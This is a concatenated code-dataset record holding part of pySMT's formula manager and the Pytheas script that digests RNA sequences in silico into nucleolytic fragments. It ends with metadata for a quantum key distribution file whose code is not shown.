return self.create_node(node_type=op.BV_ROR,
args=(formula,),
payload=(formula.bv_width(), steps))
def BVZExt(self, formula, increase):
"""Returns the extension of the BV with 'increase' additional bits
New bits are set to zero.
"""
if not is_python_integer(increase):
raise PysmtTypeError("BVZext: 'increase' should be an integer. "
"Got %s" % increase)
return self.create_node(node_type=op.BV_ZEXT,
args=(formula,),
payload=(formula.bv_width()+increase,
increase))
def BVSExt(self, formula, increase):
"""Returns the signed extension of the BV with 'increase' additional bits
New bits are set according to the most-significant-bit.
"""
if not is_python_integer(increase):
raise PysmtTypeError("BVSext: 'increase' should be an integer. "
"Got %s" % increase)
return self.create_node(node_type=op.BV_SEXT,
args=(formula,),
payload=(formula.bv_width()+increase,
increase))
def BVSLT(self, left, right):
"""Returns the SIGNED LOWER-THAN comparison for BV."""
return self.create_node(node_type=op.BV_SLT,
args=(left, right))
def BVSLE(self, left, right):
"""Returns the SIGNED LOWER-THAN-OR-EQUAL-TO comparison for BV."""
return self.create_node(node_type=op.BV_SLE,
args=(left, right))
def BVComp(self, left, right):
"""Returns a BV of size 1 equal to 0 if left is equal to right,
otherwise 1 is returned."""
return self.create_node(node_type=op.BV_COMP,
args=(left, right),
payload=(1,))
def BVSDiv(self, left, right):
"""Returns the SIGNED DIVISION of left by right"""
return self.create_node(node_type=op.BV_SDIV,
args=(left, right),
payload=(left.bv_width(),))
def BVSRem(self, left, right):
"""Returns the SIGNED REMAINDER of left divided by right"""
return self.create_node(node_type=op.BV_SREM,
args=(left, right),
payload=(left.bv_width(),))
def BVAShr(self, left, right):
"""Returns the RIGHT arithmetic rotation of the left BV by the number
of steps specified by the right BV."""
if is_python_integer(right):
right = self.BV(right, left.bv_width())
return self.create_node(node_type=op.BV_ASHR,
args=(left, right),
payload=(left.bv_width(),))
def BVNand(self, left, right):
"""Returns the NAND composition of left and right."""
return self.BVNot(self.BVAnd(left, right))
def BVNor(self, left, right):
"""Returns the NOR composition of left and right."""
return self.BVNot(self.BVOr(left, right))
def BVXnor(self, left, right):
"""Returns the XNOR composition of left and right."""
return self.BVOr(self.BVAnd(left, self.BVNot(right)),
self.BVAnd(self.BVNot(left), right))
def BVSGT(self, left, right):
"""Returns the SIGNED GREATER-THAN comparison for BV."""
return self.BVSLT(right, left)
def BVSGE(self, left, right):
"""Returns the SIGNED GREATER-THAN-OR-EQUAL-TO comparison for BV."""
return self.BVSLE(right, left)
def BVSMod(self, left, right):
"""Returns the SIGNED MODULUS of left divided by right."""
# According to SMT-LIB standard (2015-06-23) BVSMod is defined as follows
# http://smtlib.cs.uiowa.edu/logics-all.shtml#QF_BV
#
# For all terms s,t of sort (_ BitVec m), where 0 < m,
# (bvsmod s t) abbreviates
# (let ((?msb_s ((_ extract |m-1| |m-1|) s))
# (?msb_t ((_ extract |m-1| |m-1|) t)))
# (let ((abs_s (ite (= ?msb_s #b0) s (bvneg s)))
# (abs_t (ite (= ?msb_t #b0) t (bvneg t))))
# (let ((u (bvurem abs_s abs_t)))
# (ite (= u (_ bv0 m))
# u
# (ite (and (= ?msb_s #b0) (= ?msb_t #b0))
# u
# (ite (and (= ?msb_s #b1) (= ?msb_t #b0))
# (bvadd (bvneg u) t)
# (ite (and (= ?msb_s #b0) (= ?msb_t #b1))
# (bvadd u t)
# (bvneg u))))))))
m = left.bv_width()
s = left
t = right
zero_1 = self.BV("#b0")
one_1 = self.BV("#b1")
msb_s = self.BVExtract(s, m-1, m-1)
msb_t = self.BVExtract(t, m-1, m-1)
abs_s = self.Ite(self.Equals(msb_s, zero_1), s, self.BVNeg(s))
abs_t = self.Ite(self.Equals(msb_t, zero_1), t, self.BVNeg(t))
u = self.BVURem(abs_s, abs_t)
cond1 = self.Equals(u, self.BV(0, m))
cond2 = self.And(self.Equals(msb_s, zero_1), self.Equals(msb_t, zero_1))
cond3 = self.And(self.Equals(msb_s, one_1), self.Equals(msb_t, zero_1))
cond4 = self.And(self.Equals(msb_s, zero_1), self.Equals(msb_t, one_1))
case3 = self.BVAdd(self.BVNeg(u), t)
case4 = self.BVAdd(u, t)
case5 = self.BVNeg(u)
return self.Ite(self.Or(cond1, cond2), u,
self.Ite(cond3, case3, self.Ite(cond4, case4, case5)))
def BVRepeat(self, formula, count=1):
"""Returns the concatenation of count copies of formula."""
res = formula
for _ in xrange(count-1):
res = self.BVConcat(res, formula)
return res
def StrLength(self, formula):
"""Returns the length of a formula resulting a String"""
return self.create_node(node_type=op.STR_LENGTH, args=(formula,))
def StrConcat(self, *args):
"""Returns the concatenation of n Strings.
s1, s2, ..., and sn are String terms.
String concatenation takes at least 2 arguments.
"""
tuple_args = self._polymorph_args_to_tuple(args)
if len(tuple_args) <= 1:
raise TypeError("Cannot create a Str_Concat without arguments.")
return self.create_node(node_type=op.STR_CONCAT, args=tuple_args)
def StrContains(self, s, t):
"""Returns wether the String s contains the String t.
s and t are String terms.
"""
return self.create_node(node_type=op.STR_CONTAINS, args=(s, t))
def StrIndexOf(self, s, t, i):
"""Returns the position of the first occurrence of t in s after the index i.
s and t being a non empty strings and i a non-negative integer.
It returns -1 if the value to search for never occurs.
"""
return self.create_node(node_type=op.STR_INDEXOF, args=(s, t, i))
def StrReplace(self, s, t1, t2):
"""Returns a new string where the first occurrence of t1 is replace by t2.
where s, t1 and t2 are string terms, t1 is non-empty.
"""
return self.create_node(node_type=op.STR_REPLACE, args=(s, t1, t2))
def StrSubstr(self, s, i, j):
"""Returns a substring of s starting at i and ending at j+i.
where s is a string term and i, j are integer terms.
"""
return self.create_node(node_type=op.STR_SUBSTR, args=(s, i, j))
def StrPrefixOf(self, s, t):
"""Returns whether the s is a prefix of the string t.
where s and t are string terms.
"""
return self.create_node(node_type=op.STR_PREFIXOF, args=(s, t))
def StrSuffixOf(self, s, t):
"""Returns whether the string s is a suffix of the string t.
where s and t are string terms.
"""
return self.create_node(node_type=op.STR_SUFFIXOF, args=(s, t))
def StrToInt(self, s):
"""Returns the corresponding natural number of s.
If s does not represent a natural number, it returns -1.
"""
return self.create_node(node_type=op.STR_TO_INT, args=(s,))
def IntToStr(self, x):
"""Returns the corresponding String representing the natural number x.
where x is an integer term. If x is not a natural number it
returns the empty String.
"""
return self.create_node(node_type=op.INT_TO_STR, args=(x, ))
def StrCharAt(self, s, i):
"""Returns a single character String at position i.
s is a string term and i is an integer term. i is the position.
"""
return self.create_node(node_type=op.STR_CHARAT, args=(s, i))
def BVToNatural(self, formula):
"""Returns the Natural number represented by the BitVector.
Given a BitVector of width m returns an integer between 0 and 2^m-1
"""
return self.create_node(node_type=op.BV_TONATURAL, args=(formula,))
def Select(self, arr, idx):
"""Creates a node representing an array selection."""
return self.create_node(node_type=op.ARRAY_SELECT, args=(arr, idx))
def Store(self, arr, idx, val):
"""Creates a node representing an array update."""
return self.create_node(node_type=op.ARRAY_STORE, args=(arr, idx, val))
def Array(self, idx_type, default, assigned_values=None):
"""Creates a node representing an array having index type equal to
idx_type, initialized with default values.
If assigned_values is specified, then it must be a map from
constants of type idx_type to values of the same type as
default and the array is initialized correspondingly.
"""
if not isinstance(idx_type, types.PySMTType):
raise PysmtTypeError("idx_type is not a valid type: '%s'" % idx_type)
args = [default]
if assigned_values:
for k in sorted(assigned_values, key=id):
if not k.is_constant():
raise PysmtValueError("Array initialization indexes must "
"be constants")
# It is useless to represent assignments equal to the default
if assigned_values[k] != default:
args.append(k)
args.append(assigned_values[k])
return self.create_node(node_type=op.ARRAY_VALUE, args=tuple(args),
payload=idx_type)
def _Algebraic(self, val):
"""Returns the algebraic number val."""
return self.create_node(node_type=op.ALGEBRAIC_CONSTANT,
args=tuple(),
payload=val)
# FixedPoint functions
def UFXP(self, bv, fb):
if type(fb) is FNode and (fb.node_type() is op.INT_CONSTANT or
fb.node_type() is op.REAL_CONSTANT):
fb = int(fb._content.payload)
return self.create_node(node_type=op.UFXP_CONSTANT,
args=(bv,),
payload=(fb,))
def SFXP(self, bv, fb):
if type(fb) is FNode and (fb.node_type() is op.INT_CONSTANT or
fb.node_type() is op.REAL_CONSTANT):
fb = int(fb._content.payload)
return self.create_node(node_type=op.SFXP_CONSTANT,
args=(bv,),
payload=(fb,))
def TOSFXP(self, om, rm, src, tb, fb):
if type(fb) is FNode and (fb.node_type() is op.INT_CONSTANT or
fb.node_type() is op.REAL_CONSTANT):
fb = int(fb._content.payload)
if type(tb) is FNode and (tb.node_type() is op.INT_CONSTANT or
tb.node_type() is op.REAL_CONSTANT):
tb = int(tb._content.payload)
return self.create_node(node_type=op.TO_SFXP,
args=(om, rm, src),
payload=(tb, fb))
def TOUFXP(self, om, rm, src, to_tb, to_fb):
src_ty = self.env.stc.get_type(src)
if type(to_fb) is FNode and (to_fb.node_type() is op.INT_CONSTANT or
to_fb.node_type() is op.REAL_CONSTANT):
to_fb = int(to_fb._content.payload)
if type(to_tb) is FNode and (to_tb.node_type() is op.INT_CONSTANT or
to_tb.node_type() is op.REAL_CONSTANT):
to_tb = int(to_tb._content.payload)
return self.create_node(node_type=op.TO_UFXP,
args=(om, rm, src),
payload=(to_tb, to_fb,
src_ty._total_width, src_ty._frac_width))
def UFXPLT(self, left, right):
"""Returns the formula left < right."""
return self.create_node(node_type=op.UFXP_LT,
args=(left, right))
def SFXPLT(self, left, right):
"""Returns the formula left < right."""
return self.create_node(node_type=op.SFXP_LT,
args=(left, right))
def UFXPLE(self, left, right):
"""Returns the formula left <= right."""
return self.create_node(node_type=op.UFXP_LE,
args=(left, right))
def SFXPLE(self, left, right):
"""Returns the formula left <= right."""
return self.create_node(node_type=op.SFXP_LE,
args=(left, right))
def UFXPGT(self, left, right):
"""Returns the formula right < left."""
return self.create_node(node_type=op.UFXP_LT,
args=(right, left))
def SFXPGT(self, left, right):
"""Returns the formula right < left."""
return self.create_node(node_type=op.SFXP_LT,
args=(right, left))
def UFXPGE(self, left, right):
"""Returns the formula right <= left."""
return self.create_node(node_type=op.UFXP_LE,
args=(right, left))
def SFXPGE(self, left, right):
"""Returns the formula right <= left."""
return self.create_node(node_type=op.SFXP_LE,
args=(right, left))
def UFXPAdd(self, om, left, right):
"""Returns the sum of two unsigned fixed-points."""
return self.create_node(node_type=op.UFXP_ADD,
args=(om, left, right))
def SFXPAdd(self, om, left, right):
"""Returns the addition of two signed fixed-points."""
return self.create_node(node_type=op.SFXP_ADD,
args=(om, left, right))
def UFXPSub(self, om, left, right):
"""Returns the addition of two unsigned fixed-points."""
return self.create_node(node_type=op.UFXP_SUB,
args=(om, left, right))
def SFXPSub(self, om, left, right):
"""Returns the subtraction of two signed fixed-points."""
return self.create_node(node_type=op.SFXP_SUB,
args=(om, left, right))
def UFXPMul(self, om, rm, left, right):
"""Returns the multiplication of two unsigned fixed-points."""
return self.create_node(node_type=op.UFXP_MUL,
args=(om, rm, left, right))
def SFXPMul(self, om, rm, left, right):
"""Returns the multiplication of two signed fixed-points."""
return self.create_node(node_type=op.SFXP_MUL,
args=(om, rm, left, right))
def UFXPDiv(self, om, rm, left, right):
"""Returns the division of two unsigned fixed-points."""
return self.create_node(node_type=op.UFXP_DIV,
args=(om, rm, left, right))
def SFXPDiv(self, om, rm, left, right):
"""Returns the division of two signed fixed-points."""
return self.create_node(node_type=op.SFXP_DIV,
args=(om, rm, left, right))
def SFXPNeg(self, om, arg):
"""Returns the negation of a signed fixed-point number."""
ty = self.env.stc.get_type(arg)
total_width = ty.total_width
frac_width = ty.frac_width
return self.SFXPSub(om,
self.SFXP(self.SBV(0, total_width), frac_width),
arg)
def ST(self):
return self.create_node(node_type=op.ST, args=())
def WP(self):
return self.create_node(node_type=op.WP, args=())
def RU(self):
return self.create_node(node_type=op.RU, args=())
def RD(self):
return self.create_node(node_type=op.RD, args=())
#
# Helper functions
#
def normalize(self, formula):
"""Returns the formula normalized to the current Formula Manager.
This method is useful to contextualize a formula coming from another
formula manager.
E.g., f_a is defined with the FormulaManager a, and we want to
obtain f_b that is the formula f_a expressed on the
FormulaManager b : f_b = b.normalize(f_a)
"""
normalizer = FormulaContextualizer(self.env)
return normalizer.walk(formula)
def _polymorph_args_to_tuple(self, args):
""" Helper function to return a tuple of arguments from args.
This function is used to allow N-ary operators to express their arguments
both as a list of arguments or as a tuple of arguments: e.g.,
And([a,b,c]) and And(a,b,c)
are both valid, and they are converted into a tuple (a,b,c) """
if len(args) == 1 and isinstance(args[0], Iterable):
args = args[0]
return tuple(args)
def __contains__(self, node):
"""Checks whether the given node belongs to this formula manager.
This overloads the 'in' operator, making it possible to write:
E.g., if x in formula_manager: ...
"""
if node._content in self.formulae:
return self.formulae[node._content] == node
else:
return False
#EOC FormulaManager
class FormulaContextualizer(IdentityDagWalker):
"""Helper class to recreate a formula within a new environment."""
def __init__(self, env=None):
IdentityDagWalker.__init__(self, env=env)
self.type_normalize = self.env.type_manager.normalize
def walk_symbol(self, formula, args, **kwargs):
# Recreate the Symbol taking into account the type information
ty = formula.symbol_type()
newty = self.type_normalize(ty)
return self.mgr.Symbol(formula.symbol_name(), newty)
def walk_array_value(self, formula, args, **kwargs):
# Recreate the ArrayValue taking into account the type information
assign = dict(zip(args[1::2], args[2::2]))
ty = self.type_normalize(formula.array_value_index_type())
return self.mgr.Array(ty, args[0], assign)
def walk_function(self, formula, args, **kwargs):
# We re-create the symbol name
old_name = formula.function_name()
new_name = self.walk_symbol(old_name, None)
return self.mgr.Function(new_name, args)
| 38.026625
| 86
| 0.553089
|
c37772a0b88a5e2b9ea81e6276f1311b5b2623fa
| 21,306
|
py
|
Python
|
CL_version/in_silico_digestion/1_enzyme.py
|
ldascenzo/pytheas
|
1010bb082fa3db35db73b936195e00c76aaa4525
|
[
"MIT"
] | null | null | null |
CL_version/in_silico_digestion/1_enzyme.py
|
ldascenzo/pytheas
|
1010bb082fa3db35db73b936195e00c76aaa4525
|
[
"MIT"
] | null | null | null |
CL_version/in_silico_digestion/1_enzyme.py
|
ldascenzo/pytheas
|
1010bb082fa3db35db73b936195e00c76aaa4525
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
"""
Last update: November 2021
Author: Luigi D'Ascenzo, PhD - The Scripps Research Institute, La Jolla (CA)
Contact info: dascenzoluigi@gmail.com
GitHub project repository: https://github.com/ldascenzo/pytheas
***DESCRIPTION***
First step of the Pytheas in silico digest library generation. Given RNA sequences(s) in fasta format are cleaved
with a specific RNA endonuclease enzyme (or not if the user choses so). Additional parameters such as missed cleavages
(up to 4), 3' and 5' chemistry [P, OH or cP] for the nucleolytic fragments and the whole RNA molecule are optional.
If non-specific nucleoltic cleavage is requested, the values of minimum and maximum nucleolytic sequences length
has to be specified.
***OPTIONS***
--RNA_sequences (REQUIRED) -> Input RNA sequence file(s) in fasta format. First string of the header for each sequence
will be used as sequence id. NOTE: file names input without "=" nor comma.
--enzyme (REQUIRED) -> RNA endonuclease selected for the digestion: options are in the following dictionary, where
a * indicates the cleaving site {'A': ['C*', 'U*'], 'T1': ['G*'], 'U2': ['A*', 'G*'],
'Cus': ['C*A', 'C*G', 'C*U'], 'MC1': ['U*U', 'C*U', 'A*U'], 'MAZ': ['*ACA'],
'none': no cleavage, 'nonspecific':
cleaves after every nucleotide, generating sequences of length specified by the nonspecific_
options, 'custom' : custom input cleavage file}
--custom_enzyme (OPTIONAL) -> input file for custom cleavage, where all the cleavage sites are indicated one per line
using the * for the cleaving point (e.g. C*A for cutting after a C and before A or
G* for cutting after every G). Some IUPAC one letter code for nucleotides are supported,
Y for pyrimidines (C or U), R for purines (A or G) and N for any nucleotide (A, C, G or U)
--miss (OPTIONAL, DEFAULT = 0) -> number of possible consecutive missed cleavages (up to).
--nonspecific_min_length (OPTIONAL, DEFAULT = 3) -> Maximum length for the nucleolytic fragments obtained if
nonspecific cleavage is selected.
--nonspecific_max_length (OPTIONAL, DEFAULT = 10) -> Maximum length for the nucleolytic fragments obtained if
nonspecific cleavage is selected.
--cleaved_fragments_5end_chem (OPTIONAL, DEFAULT='OH') -> 5' chemistry of the RNA nucleolytic fragments
Possible choices=['OH', 'P']. NOTE: parameters input without "=" nor comma.
--cleaved_fragments_3end_chem (OPTIONAL, DEFAULT='P') -> 3' chemistry of the RNA nucleolytic fragments
Possible choices=['OH', 'P', 'cP']. NOTE: parameters input without "=" nor comma.
--RNA_5end_chem (OPTIONAL, DEFAULT='P') -> 5' chemistry of the input RNA molecule(s) ['OH' or 'P'].
NOTE: this refers to the whole RNA molecule and not to the nucleolytic fragments. Parameters
input without "=" nor comma.
--RNA_3end_chem (OPTIONAL, DEFAULT='OH') -> 3' chemistry of the input RNA molecule(s) ['OH' or 'P'].
NOTE: this refers to the whole RNA molecule and not to the nucleolytic fragments. Parameters
input without "=" nor comma.
***OUTPUT***
1) output.1 file contains all the RNA nucleolytic fragments with info on their sequence, numbering referred to the input
RNA sequence, number of missed cleavages and 3'/5'-end chemistry.
2) seq_output containing a compact version of the input RNA sequences, used for modification sites validation in later
steps of the in silico digestion generation
"""
import argparse
import os
import re
import sys
from Bio import SeqIO
# Initialize and define launch options
parser = argparse.ArgumentParser(description='List of available options')
parser.add_argument('--RNA_sequences', nargs='*', required=True,
help='Input RNA sequence file(s). Please use fasta format and input the file names without '
'"=" after the option. First string of the header for each sequence will be used as id')
parser.add_argument('--enzyme', choices=['A', 'T1', 'U2', 'none', 'nonspecific', 'Cus',
'MC1', 'MAZ', 'custom'], required=True,
help='Nuclease enzyme used for digestion')
parser.add_argument('--custom_enzyme', default=None, help='Input file with custom enzymatic cleavage sites')
parser.add_argument('--miss', type=int, choices=[0, 1, 2, 3, 4], default=0,
help='Number of possible consecutive miss cleavages to consider (Max 4), up to given value')
parser.add_argument('--nonspecific_min_length', type=int, default=3,
help='Minimum length for the oligos obtained from nonspecific cleavage. Default = 3')
parser.add_argument('--nonspecific_max_length', type=int, default=10,
help='Maximum length for the oligos obtained from nonspecific cleavage. Default = 10')
parser.add_argument("--cleaved_fragments_5end_chem", nargs='*', default=['OH'], choices=['OH', 'P'],
help="Set the 5' chemistry of the RNA fragments cleaved from the chosen endonuclease to be 'OH' or "
"'P' . Input of values spaced without '=' nor commas (default = OH)")
parser.add_argument("--cleaved_fragments_3end_chem", nargs='*', default=['P'], choices=['OH', 'P', 'cP'],
help="Set the 3' chemistry of the RNA fragments cleaved from the chosen endonuclease to be 'OH', "
"'P' or 'cP'. Input of values spaced without '=' nor commas (default = P)")
parser.add_argument("--RNA_5end_chem", nargs='*', default=['P'], choices=['OH', 'P'],
help="Set the 5' chemistry of the input RNA molecule(s) [options are 'OH' or 'P' ]. "
"Note that this option refers to the whole RNA molecule and not to oligomers after digestion "
"Input of values spaced without '=' nor commas (default = P)")
parser.add_argument("--RNA_3end_chem", nargs='*', default=['OH'], choices=['OH', 'P', 'cP'],
help="Set the 3' chemistry of the input RNA molecule(s) [options are 'OH', 'P' or 'cP']. "
"Note that this option refers to the whole RNA molecule and not to oligomers after digestion "
"Input of values spaced without '=' nor commas (default = OH)")
args = parser.parse_args()
def read_custom_enzyme(infile):
"""
Create a list of custom RNase cleaving sites from an input file
"""
outlist = []
with open(infile.rstrip(), 'r') as handle:
for line in handle:
if '*' in line and line[0] != '#':
outlist.append(line.rstrip())
return outlist
def enzyme_cut():
"""
Define the dictionary of the standard RNase cleaving sites identified with a *
"""
return {'A': ['C*', 'U*'], 'T1': ['G*'], 'U2': ['A*', 'G*'], 'Cus': ['C*A', 'C*G', 'C*U'],
'MC1': ['U*U', 'C*U', 'A*U'], 'MAZ': ['*ACA'], 'none': []}
def iupac_letter_codes_nts():
"""
Dictionary with the one letter code symbols for RNA nucleotides
From: https://www.megasoftware.net/web_help_7/rh_iupac_single_letter_codes.htm
"""
return {'A': 'A', 'C': 'C', 'G': 'G', 'U': 'U', 'Y': '[CU]', 'R': '[AG]', 'N': '[ACGU]'}
def print_ReSites(id, sequence, enzyme):
output_lines = []
global pattern_glob
pattern_glob = []
if enzyme == 'none':
sites = []
# Adding only one fragment in the case of no enzymatic digestion
output_lines.append("{} {} {} {} {}\n".format(id, sequence, str(1), str(len(sequence)), str(
0)))
else:
sites = []
if enzyme == 'custom':
if not args.custom_enzyme:
print(
"ERROR!! Select an input file with the custom cleaving sites")
sys.exit(1)
else:
cleaving_sites = read_custom_enzyme(args.custom_enzyme)
else:
cleaving_sites = enzyme_cut()[enzyme]
for cut in cleaving_sites:
s = cut.split('*')
if s[0] != '' and s[1] != '':
nt1, nt2 = '', ''
for letter in s[0]:
nt1 += iupac_letter_codes_nts()[letter]
for letter in s[1]:
nt2 += iupac_letter_codes_nts()[letter]
pattern = r"(?=({0}{1}))".format(nt1, nt2)
pattern_glob.append(pattern)
sites += [(str(m.start() + len(s[0]) - 1), pattern) for m in re.finditer(pattern, sequence)]
else:
if s[0] == '':
nt = ''
for letter in s[1]:
nt += iupac_letter_codes_nts()[letter]
if len(nt) == 1:
pattern = r"(?!^)({0})".format(nt)
else:
pattern = r"(?!^)(?=({0}))".format(nt)
pattern_glob.append(pattern)
sites += [(str(m.start() - 1), pattern) for m in re.finditer(pattern, sequence)]
if s[1] == '':
nt = ''
for letter in s[0]:
nt += iupac_letter_codes_nts()[letter]
if len(nt) == 1:
pattern = r"({0})(?!$)".format(nt)
else:
pattern = r"(?=({0})(?!$))".format(nt)
pattern_glob.append(pattern)
sites += [(str(m.start() + len(s[0]) - 1), pattern) for m in re.finditer(pattern, sequence)]
# Order the list of all the cleavage sites for the given enzyme
sites.sort(key=lambda y: int(y[0]))
if sites:
# Dirty trick: manually adding the first fragment to the fragments list
output_lines.append("{} {} {} {} {}\n".format(id, sequence[:int(sites[0][0]) + 1], str(1),
str(int(sites[0][0]) + 1), str(0)))
sites.append(str(len(sequence)))
# Loop to add all the remaining fragments to the output list
for start, end in zip(sites, sites[1:]):
if type(end) == tuple:
if sequence[int(start[0]) + 1:int(end[0]) + 1]:
output_lines.append(
"{} {} {} {} {} {}\n".format(id, sequence[int(start[0]) + 1:int(end[0]) + 1],
str(int(start[0]) + 2),
str(int(end[0]) + 1), str(0), start[1]))
else:
if sequence[int(start[0]) + 1:int(end) + 1]:
output_lines.append(
"{} {} {} {} {} {}\n".format(id, sequence[int(start[0]) + 1:int(end) + 1], str(int(start[0]) + 2),
str(int(end)), str(0), start[1]))
return output_lines
def miss_1(input_list):
"""
Generate the fragments with 1 missed cleavage
"""
output_list = []
for x, y in zip(input_list, input_list[1:]):
miss = 0
for pattern in pattern_glob:
miss += len(re.findall(pattern, f"{x.split()[1]}{y.split()[1]}"))
output_list.append(
"{} {}{} {} {} {}\n".format(x.split()[0], x.split()[1], y.split()[1], x.split()[2], y.split()[3], miss))
return input_list + output_list
def miss_2(input_list):
"""
Generate the fragments with 2 missed cleavages
"""
output_list = []
for x, y, z in zip(input_list, input_list[1:], input_list[2:]):
if len(z.split()) == 6:
miss = 0
for pattern in pattern_glob:
miss += len(re.findall(pattern, f"{x.split()[1]}{y.split()[1]}{z.split()[1]}"))
output_list.append(
"{} {}{}{} {} {} {}\n".format(x.split()[0], x.split()[1], y.split()[1], z.split()[1], x.split()[2],
z.split()[3], miss))
return input_list + output_list
def miss_3(input_list):
"""
Generate the fragments with 3 missed cleavages
"""
output_list = []
for x, y, z, w in zip(input_list, input_list[1:], input_list[2:], input_list[3:]):
if len(w.split()) == 6:
miss = 0
for pattern in pattern_glob:
miss += len(re.findall(pattern, f"{x.split()[1]}{y.split()[1]}{z.split()[1]}{w.split()[1]}"))
output_list.append(
"{} {}{}{}{} {} {} {}\n".format(x.split()[0], x.split()[1], y.split()[1], z.split()[1], w.split()[1],
x.split()[2], w.split()[3], miss))
return input_list + output_list
def miss_4(input_list):
"""
Generate the fragments with 4 missed cleavages
"""
output_list = []
for x, y, z, w, v in zip(input_list, input_list[1:], input_list[2:], input_list[3:], input_list[4:]):
if len(v.split()) == 6:
miss = 0
for pattern in pattern_glob:
miss += len(re.findall(pattern, f"{x.split()[1]}{y.split()[1]}{z.split()[1]}{w.split()[1]}"
f"{v.split()[1]}"))
output_list.append(
"{} {}{}{}{}{} {} {} {}\n".format(x.split()[0], x.split()[1], y.split()[1], z.split()[1], w.split()[1],
v.split()[1], x.split()[2], v.split()[3], miss))
return input_list + output_list
def clean_lines(input_list):
output_list = []
for line in input_list:
output_list.append(' '.join(line.split()[:5]))
return output_list
def nonspecific(rna_id, sequence, min_length, max_length):
"""
Compute all the fragment sequences in case of nonspecific cleavage, based on the info selected by the user
on minimum and maximum length for the sequences generated from nonspecific cleavage
"""
output_sequences, seq_list = [], list(sequence)
for i in range(min_length, max_length + 1):
if i <= len(sequence):
for position in range(0, len(sequence) - i + 1):
seq_to_add = ''.join(seq_list[position:position + i])
output_sequences.append(
"{} {} {} {} {}\n".format(rna_id, seq_to_add, position + 1, position + i, 0))
return output_sequences
def generate_output():
"""
Final output file generation with lines in the format:
molecule sequence residue_start residue_end miss 5'end 3'end
"""
final_lines, seq_output, unique_ids = [], [], []
sequences_dictionary = {}
# Loop through the fasta files given as input extracting the sequences
for fasta_file in args.RNA_sequences:
if fasta_file[0].isdigit() or fasta_file[0].isalpha():
with open(os.getcwd() + "/" + fasta_file.rstrip(), 'r') as handle:
# Extract and process the input fasta sequences
for seq in SeqIO.parse(handle, "fasta"):
if seq.id in unique_ids:
print(
"ERROR!! The molecule id {} is used to identify multiple molecules. Please edit the "
"molecules id in the fasta file to be uniques. Execution terminated without output".format(
seq.id))
sys.exit(1)
else:
unique_ids.append(seq.id)
sequence = str(seq.seq.ungap("-"))
sequences_dictionary[str(seq.id)] = sequence
seq_output.append(str(seq.id) + " " + sequence + "\n")
# Append the nonspecific cleavage lines
if args.enzyme == 'nonspecific':
final_lines = final_lines + nonspecific(str(seq.id), sequence, args.nonspecific_min_length,
args.nonspecific_max_length)
# Append the missed cleavages lines based on the selected values
else:
if args.miss == 0:
final_lines = final_lines + clean_lines(print_ReSites(str(seq.id), sequence,
args.enzyme))
elif args.miss == 1:
final_lines = final_lines + clean_lines(miss_1(
print_ReSites(str(seq.id), sequence, args.enzyme)))
elif args.miss == 2:
final_lines = final_lines + clean_lines(miss_2(
miss_1(print_ReSites(str(seq.id), sequence, args.enzyme))))
elif args.miss == 3:
final_lines = final_lines + clean_lines(miss_3(
miss_2(miss_1(print_ReSites(str(seq.id), sequence, args.enzyme)))))
elif args.miss == 4:
final_lines = final_lines + clean_lines(miss_4(miss_3(
miss_2(miss_1(print_ReSites(str(seq.id), sequence, args.enzyme))))))
open(os.getcwd() + "/seq_output", 'w').writelines(seq_output)
# Add the information about 3' and 5' chemistry to the cleaved fragments
output_lines = []
for line in final_lines:
output_lines.extend(assign_chemistry(line, sequences_dictionary))
return output_lines
def assign_chemistry(fragment, sequences):
"""
Assign the 3' and 5' chemistry to the cleaved fragments based on the user-specific options
"""
values = fragment.split()
outlines = []
# Add the 5' and 3' chemistry for the starting and ending nucleotides of each RNA sequence
if values[2] == '1':
for end5 in args.RNA_5end_chem:
if int(values[3]) == len(sequences[values[0]]):
for end3 in args.RNA_3end_chem:
outlines.append("{} {} {}\n".format(fragment.rstrip(), end5, end3))
else:
for end3 in args.cleaved_fragments_3end_chem:
outlines.append("{} {} {}\n".format(fragment.rstrip(), end5, end3))
# Add the chemistry info for all the other sequences
else:
for end5 in args.cleaved_fragments_5end_chem:
if int(values[3]) == len(sequences[values[0]]):
for end3 in args.RNA_3end_chem:
outlines.append("{} {} {}\n".format(fragment.rstrip(), end5, end3))
else:
for end3 in args.cleaved_fragments_3end_chem:
outlines.append("{} {} {}\n".format(fragment.rstrip(), end5, end3))
return outlines
if __name__ == "__main__":
"""
Generate the output file output.1
"""
cleavages = ''
if args.enzyme == 'custom':
if not args.custom_enzyme:
print(
"ERROR!! Select an input file with the custom cleaving sites")
sys.exit(1)
else:
cleavages = f"#CLEAVING_SITES {','.join(read_custom_enzyme(args.custom_enzyme))}\n"
# The header info differ based on the choice of nonspecific or specific cleavage
if args.enzyme == 'nonspecific':
starting_lines = ["#INPUT_SEQUENCE {}\n#ENZYME {}\n#NONSPECIFIC_MIN_LENGTH {}\n#NONSPECIFIC_MAX_LENGTH {}"
"\n#CLEAVED_RNA_5'CHEMISTRY"
" {}\n#CLEAVED_RNA_3'CHEMISTRY {}\n#RNA_5'CHEMISTRY {}\n#RNA_3'CHEMISTRY "
"{}\n"
"molecule sequence residue_start residue_end miss 5'end 3'end\n".format(os.path.basename(
args.RNA_sequences[0]),
args.enzyme,
args.nonspecific_min_length,
args.nonspecific_max_length,
','.join(
args.cleaved_fragments_5end_chem),
','.join(
args.cleaved_fragments_3end_chem),
','.join(
args.RNA_5end_chem),
','.join(
args.RNA_3end_chem))]
else:
starting_lines = ["#INPUT_SEQUENCE {}\n"
"#ENZYME {}\n#MISSED_CLEAVAGES {}\n#CLEAVED_RNA_5'CHEMISTRY {}\n"
"#CLEAVED_RNA_3'CHEMISTRY {}\n#RNA_5'CHEMISTRY {}\n#RNA_3'CHEMISTRY {}\n"
"{}"
"molecule sequence residue_start residue_end miss 5'end 3'end\n".format(os.path.basename(
args.RNA_sequences[0]),
args.enzyme,
args.miss,
','.join(
args.cleaved_fragments_5end_chem),
','.join(
args.cleaved_fragments_3end_chem),
','.join(
args.RNA_5end_chem),
','.join(
args.RNA_3end_chem),
cleavages)]
open(os.getcwd() + "/output.1", 'w').writelines(starting_lines + list(set(generate_output())))
print("Done! Output file(s) -> output.1 seq_output")
| 47.241685
| 120
| 0.543837
|
a3f9ff9430b357d27a0d3ac3700f1b6af25cdea9
| 3,343
|
py
|
Python
|
QNetwork/qkd/qkd.py
|
SwamyDev/q_network
|
4f1866f8d06e4f206b4ada5e86396a4da26f28f7
|
[
"MIT"
] | null | null | null |
QNetwork/qkd/qkd.py
|
SwamyDev/q_network
|
4f1866f8d06e4f206b4ada5e86396a4da26f28f7
|
[
"MIT"
